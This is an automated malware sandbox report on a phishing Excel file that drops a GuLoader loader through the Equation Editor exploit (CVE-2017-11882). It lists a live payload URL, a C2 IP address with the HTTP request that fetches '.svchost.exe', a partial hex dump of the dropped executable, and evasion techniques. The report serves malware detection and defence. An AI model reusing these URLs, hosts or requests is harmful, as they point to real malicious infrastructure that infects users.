Windows Analysis Report new order requirment-21 July.xlsx

Overview

General Information

Sample Name: new order requirment-21 July.xlsx
Analysis ID: 451759
MD5: 25f7735ff71a70abf4bb508d2711f50b
SHA1: 7f40fff223019a3e399ca0ae0990afaf2695e93b
SHA256: 821f2880a8218afc0d30711b46f7d28e9adb2cd6c3db88b881de91090e72337f
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_lOulvHP91.bip"}
Multi AV Scanner detection for domain / URL
Source: http://180.214.239.39/service/.svchost.exe Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Virustotal: Detection: 14% Perma Link
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 14% Perma Link
Multi AV Scanner detection for submitted file
Source: new order requirment-21 July.xlsx Virustotal: Detection: 30% Perma Link
Source: new order requirment-21 July.xlsx ReversingLabs: Detection: 28%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

barindex
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://kinmirai.org/wp-content/bin_lOulvHP91.bip
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jul 2021 06:30:40 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 20 Jul 2021 21:04:05 GMTETag: "3c468-5c79464e23873"Accept-Ranges: bytesContent-Length: 246888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c e1 51 55 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 62 71 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 03 00 28 00 00 00 00 50 03 00 b4 54 00 00 00 00 00 00 00 00 00 00 50 b0 03 00 18 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 180.214.239.39 180.214.239.39
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /service/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE6E00F3.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /service/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: DE6E00F3.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F53FF NtAllocateVirtualMemory, 6_2_002F53FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F5541 NtAllocateVirtualMemory, 6_2_002F5541
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F53FB NtAllocateVirtualMemory, 6_2_002F53FB
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F53FF 6_2_002F53FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2407 6_2_002F2407
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F207C 6_2_002F207C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F444B 6_2_002F444B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F5844 6_2_002F5844
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7CB7 6_2_002F7CB7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F38B4 6_2_002F38B4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8C81 6_2_002F8C81
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F40EF 6_2_002F40EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F04C0 6_2_002F04C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F58D6 6_2_002F58D6
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F293F 6_2_002F293F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2567 6_2_002F2567
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F6D5C 6_2_002F6D5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F51A4 6_2_002F51A4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F01E9 6_2_002F01E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F21DB 6_2_002F21DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F01DA 6_2_002F01DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F05D8 6_2_002F05D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7229 6_2_002F7229
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F0626 6_2_002F0626
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F1207 6_2_002F1207
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8605 6_2_002F8605
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F824D 6_2_002F824D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2A43 6_2_002F2A43
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7EB4 6_2_002F7EB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3EB2 6_2_002F3EB2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7AEF 6_2_002F7AEF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F06E2 6_2_002F06E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7AF5 6_2_002F7AF5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F26CA 6_2_002F26CA
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3EC0 6_2_002F3EC0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F06D2 6_2_002F06D2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F1B2E 6_2_002F1B2E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F1B24 6_2_002F1B24
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F1706 6_2_002F1706
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F6F73 6_2_002F6F73
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F4345 6_2_002F4345
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8B5E 6_2_002F8B5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8B51 6_2_002F8B51
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FA8 6_2_002F3FA8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F37A5 6_2_002F37A5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FE9 6_2_002F3FE9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3BE2 6_2_002F3BE2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F47FF 6_2_002F47FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F53FB 6_2_002F53FB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FC2 6_2_002F3FC2
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: new order requirment-21 July.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$new order requirment-21 July.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD6DE.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: new order requirment-21 July.xlsx Virustotal: Detection: 30%
Source: new order requirment-21 July.xlsx ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: new order requirment-21 July.xlsx Static file information: File size 1242112 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr
Source: new order requirment-21 July.xlsx Initial sample: OLE indicators vbamacros = False
Source: new order requirment-21 July.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2137818883.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\vbc.exe, type: DROPPED
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002212F5 push edx; ret 6_2_00221321
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221023 push edx; ret 6_2_00221051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222823 push edx; ret 6_2_00222851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224023 push edx; ret 6_2_00224051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00227024 push edx; ret 6_2_00227051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225825 push edx; ret 6_2_00225851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224833 push edx; ret 6_2_00224861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223033 push edx; ret 6_2_00223061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221833 push edx; ret 6_2_00221861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226034 push edx; ret 6_2_00226061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220038 push edx; ret 6_2_00220061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224803 push edx; ret 6_2_00224831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223003 push edx; ret 6_2_00223031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221803 push edx; ret 6_2_00221831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226004 push edx; ret 6_2_00226031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220008 push edx; ret 6_2_00220031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223813 push edx; ret 6_2_00223841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225013 push edx; ret 6_2_00225041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222014 push edx; ret 6_2_00222041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226814 push edx; ret 6_2_00226841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220818 push edx; ret 6_2_00220841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223063 push edx; ret 6_2_00223091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221863 push edx; ret 6_2_00221891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224863 push edx; ret 6_2_00224891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226065 push edx; ret 6_2_00226091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220068 push edx; ret 6_2_00220091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222074 push edx; ret 6_2_002220A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223874 push edx; ret 6_2_002238A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225074 push edx; ret 6_2_002250A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226875 push edx; ret 6_2_002268A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220878 push edx; ret 6_2_002208A1

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: new order requirment-21 July.xlsx Stream path 'EncryptedPackage' entropy: 7.99879866952 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2407 6_2_002F2407
